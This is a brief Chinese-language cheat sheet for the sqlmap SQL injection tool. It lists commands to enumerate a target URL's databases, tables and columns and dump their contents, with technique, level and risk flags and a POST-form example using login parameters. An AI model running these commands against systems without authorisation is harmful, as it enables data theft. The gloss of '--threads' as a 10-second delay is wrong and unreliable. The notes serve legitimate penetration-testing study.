常规注入
Post注入
数据包注入
启动
python sqlmap.py -u url
常规注入
python sqlmap.py -u url --dbs 数据库
python sqlmap.py -u url -D DB --tables 数据库表
python sqlmap.py -u url -D DB -T tablename --columns 字段
python sqlmap.py -u url -D DB -T tablename -C "字段1,字段2……" --dump 爆数据
-u +url 需要注入的链接
–dbs 获取数据库名
–tables
–columns
-D +数据库名
-T + 表名
-C + ”X,X2,X3“列表名
其余指令
- –batch 让sqlmap自动选择执行过程中出现的询问请求 如果存在注入,就出提示某个参数是可被攻击的
- –technique
- B: Boolean-based blind SQL injection(布尔型注入)
- E: Error-based SQL injection(报错型注入)
- U: UNION query SQL injection(可联合查询注入)
- S: Stacked queries SQL injection(可多语句查询注入)
- T: Time-based blind SQL injection(基于时间延迟注入)
- –threads 10:延时10s
- –level 3 :(1-5等级)注入等级,级别越高sqlmap发送的探测payload就越多,越有可能发现注入漏洞
- –risk 3 : 注入等级
POST注入
python sqlmap.py -u url --data "参数1&参数2&参数3" --batch
--举个例子
python sqlmap.py -u url --data "uname=admin&passwd=admin&submit=Submit" --dbs --batch